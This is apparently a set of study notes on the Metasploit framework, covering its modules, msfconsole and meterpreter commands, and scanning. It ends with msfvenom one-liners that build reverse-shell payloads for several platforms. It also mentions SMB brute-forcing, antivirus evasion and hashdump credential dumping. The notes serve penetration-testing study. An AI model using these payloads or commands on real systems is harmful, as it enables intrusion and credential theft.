Skip to main content

Metasploit

Introduction

  • Metasploit is the widely used exploitation framework.
  • Metasploit has two main versions.
    • Metasploit Pro - Commercial version, Supports automation, Has GUI.
    • Metasploit Framework - Opensource, Commandline only.
  • Metasploit allows information gathering, scanning, exploit development, exploitation, post-exploitation, etc.
  • Main components of metasploit are
    • msfconsole - Main command line interface.
    • Modules - Supporting modules such as exploits, scanners, payloads, etc.
    • Tools - Standalone tools such as msfvenom, pattern_create, pattern_offset, etc.
  • Few important things to know are
    • Exploit: Piece of code that uses the vulnerability present in the target system.
    • Vulnerability - Design, code or logic flaw in the target system which could be exploited.
    • Payload - Payload is the code which runs on the target system. The payload will be used by the exploit to take advantage of the vulnerability to achieve the result that attacker wants.

Auxilary

  • Supporting module such as scanners, crawlers and fuzzers.
  • Found in path /opt/metasploit-framework/embedded/framework/modules/auxilary.

Encoders

  • Encodes the payload.
  • Encoders have limited success rates as antivirus solutions perform additional checks.
  • Found in path /opt/metasploit-framework/embedded/framework/modules/encoders.

Evasion

  • Evasion module are used for evading antivirus programs with more success rates.
  • Found in path /opt/metasploit-framework/embedded/framework/modules/evasion.

Exploits

  • Exploits neatly organized in the system.
  • Found in path /opt/metasploit-framework/embedded/framework/modules/exploits.

NOPs

  • No Operations (NOPs) do nothing.
  • They are represented in the Intel x86 family with 0x90.
  • They are used as buffer to achieve constant payload sizes.
  • Found in path /opt/metasploit-framework/embedded/framework/modules/nops.

Payloads

  • Payloads are codes that run in the system.
  • Found in path /opt/metasploit-framework/embedded/framework/modules/payloads.
  • Payloads are further divided into 4 categories.
    • Adapters - Wraps a single payload to convert it into a different format.
    • Singles - Self contained payloads.
    • Stagers - Responsible for setting up a connection between metasploit and target system. Staged payload will first upload a stager in the target machine and then download the rest of the payload(Stage).
    • Stages - Downloaded by stager.
  • In metasploit, single payloads have _ after shell keyword and staged payload have / after shell keyword.
    • Single payload: generic/shell_reverse_tcp.
    • Staged payload: windows/x64/shell/reverse_tcp.

Post exploitation

  • Useful after exploitation.
  • Found in path /opt/metasploit-framework/embedded/framework/modules/post.

Msfconsole

  • Launch with msfconsole command.
  • Search for an exploit using the search command.
    • search auxiliary
    • search auxiliary scanner ssh
    • search rank:excellent disclosure_date:2024 Windows
  • Select the exploit using the use command.
    • use auxiliary/dos/http/ws_dos
    • use 1599
  • Find more information about an exploit using info command.
    • Before selecting, send info 1599.
    • After selecting, send info command.
  • Show all options related to the exploit using show options command. Options change depending on the selected exploit.
  • Show command can be used in conjunction with other commands such as auxiliary, payloads, exploits, etc.
  • To view all the exploits use the show exploits command.
  • To view all the payloads related to the exploit use the show payloads command.
  • To leave the context of the exploit use the back command.
  • Exploit ranking: https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html

Working with modules

  • There are 5 different prompts in metasploit.
    • root@ip-10-10-XX-XX:~# - Regular command prompt.
    • msf6 > - Msfconsole prompt.
    • msf6 exploit(windows/smb/ms17_010_eternalblue) > - Context prompt. Context specific options can be used here.
    • meterpreter > - Meterpreter prompt. Meterpreter agent has loaded in the target system and connected back to the attacker's machine.
    • C:\Windows\system32> - Shell on the target system. All commands typed here will run on the target system.

Exploitation

  • Select the exploit using the use command.
  • Show options using show options command.
  • Set the context specific payload values for the exploit using set command.
  • Set the global payload values for the exploit using the setg command.
  • Unset individual values using unset or usetg command.
  • Unset all values using unset all or unsetg all command.
  • Use the check command to check if the target is vulnerable. Not all modules support check.
  • Launch the attack using exploit or run command.
  • Exploit command can be launched in background using exploit -z command.
  • Send a meterpreter session to background using background command.
  • Show all the background sessions using sessions command.
  • Interact with specific session using session -i 2 command.

Scanning

  • search portscan - List all potential scanning modules.
  • use auxiliary/scanner/portscan/tcp - Select TCP port scanner.
  • show options - Displays options for the payload.
  • For faster scanning use nmap using the command nmap -sS 10.10.12.229.

UDP Service Identification

  • Use scanner/discovery/udp_sweep to find all services running over UDP.

SMB Scans

  • smb_enumshares and smb_version - Useful in corporate network.

Useful Metasploit Scanner Modules

  • auxiliary/scanner/portscan/tcp - Find all open tcp ports.
  • scanner/smb/smb_login - Bruteforce SMB login.
  • auxiliary/scanner/netbios/nbname - Find NetBIOS information.
  • auxiliary/scanner/http/http_version - Show HTTP application version information.

Metaspoit Database

  • When working on multiple targets it could be confusing to set parameter values.
  • Metasploit has a database function to simplify project management and setting up parameter values.
  • To setup the database
    • Start postgresql database using systemctl start postgresql.
    • Initialize metasploit database using msfdb init.
    • Launch msfconsole.
    • Check database status using db_status.
  • Metasploit database has a workspace feature to isolate different projects.
    • workspace -h - Displays help information about metasploit database.
    • workspace -a - Adds a new workspace.
    • workspace <workspace_name> - Switch to workspace.
    • workspace -d - Deletes a workspace.
    • workspace -D - Deletes all workspaces.
    • workspace -r - Rename a workspace.
  • Run db_nmap instead of nmap to save results to the database.
  • Use information relevant to hosts and services using hosts and services respectively.
  • Set a host as RHOSTS using hosts -R command.
  • Search for a specific service using services -S <service_name> command.

Vulnerability Scanning

  • Use the scanner to find modules related to the potential vulnerabilities.
  • Use info command to view details about the module.

Useful Meterpreter commands

  • help - View all the commands supported in meterpreter.
  • pwd - Print working directory.
  • ls - List the files in directory.
  • shell - Drop into the shell of the remote system.
  • download - Download a file from the remote system.
  • upload - Upload a file from the attacker machine to remote machine.
  • sysinfo - Prints the system information.
  • search -f <file_name> - Finds a file in the target system.
  • hashdump - Gets the password hash for the users in the target system.

Msfvenom

  • Show list of supported payloads using msfvenom -l payloads.
  • Show list of supported output formats msfvenom --list formats.
  • To encode a payload using -e. Encoding is not an effective way to bypass antivirus programs.

Handlers

  • use exploit/multi/handler initiates the handler.
  • set payload <payload_type> - To set the payload type.
  • set lhost <attacker_host_ip> - To set the local host.
  • set lport <attacker_port_number> - To set the port for communication.
  • run or exploit to start listening.

Payload Generation

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
  • Remove the leading comment and add ?> at the end of the generated payload file.

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

Python

msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

Escalate Previleges by Upgrading Shells